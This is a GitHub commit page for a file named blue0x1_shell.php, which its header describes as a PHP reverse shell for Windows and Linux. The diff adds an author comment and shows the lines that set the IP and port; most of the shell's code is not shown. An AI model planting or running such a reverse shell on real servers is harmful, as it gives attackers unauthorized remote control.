Skip to content

Commit a57af18

Browse files
authored
Update blue0x1_shell.php
1 parent 5f61e3c commit a57af18

File tree

1 file changed

+7
-0
lines changed

1 file changed

+7
-0
lines changed

blue0x1_shell.php

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,10 @@
11
<?php
2+
/*
3+
* PHP Reverse Shell (Windows/Linux)
4+
*
5+
* Created in October 2024 by Chokri Hammedi (blue0x1)
6+
* GitHub: https://github.com/blue0x1
7+
*/
28

39
$ip = '127.0.0.1'; // Set your IP
410
$port = 4444; // Set your port
@@ -16,3 +22,4 @@
1622
}
1723

1824
?>
25+

0 commit comments

Comments
 (0)